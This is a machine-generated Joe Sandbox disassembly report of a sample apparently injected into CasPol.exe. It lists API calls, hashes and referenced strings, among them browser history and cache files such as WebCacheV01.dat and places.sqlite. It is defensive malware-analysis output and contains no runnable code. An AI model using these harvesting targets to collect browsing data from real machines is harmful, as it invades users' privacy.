                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                              Strings
                                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                              • API String ID: 3354267031-2114579845
                                                                                                                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                              APIs
                                                                                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                              • API String ID: 2221118986-1725073988
                                                                                                                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@DeleteObject
                                                                                                                                                              • String ID: r!A
                                                                                                                                                              • API String ID: 1103273653-628097481
                                                                                                                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$memcmp
                                                                                                                                                              • String ID: $$8
                                                                                                                                                              • API String ID: 2808797137-435121686
                                                                                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                              Strings
                                                                                                                                                              • too many columns on %s, xrefs: 00430763
                                                                                                                                                              • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                              • API String ID: 0-1445880494
                                                                                                                                                              • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                              • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                              • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                              • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1979745280-0
                                                                                                                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                              • String ID: history.dat$places.sqlite
                                                                                                                                                              • API String ID: 2641622041-467022611
                                                                                                                                                              • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                              • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 839530781-0
                                                                                                                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID: *.*$index.dat
                                                                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1125800050-0
                                                                                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandleSleep
                                                                                                                                                              • String ID: }A
                                                                                                                                                              • API String ID: 252777609-2138825249
                                                                                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                              APIs
                                                                                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                              • free.MSVCRT ref: 00409A31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: d
                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: BINARY
                                                                                                                                                              • API String ID: 2221118986-907554435
                                                                                                                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                              • String ID: /stext
                                                                                                                                                              • API String ID: 2081463915-3817206916
                                                                                                                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                              Memory Dump Source
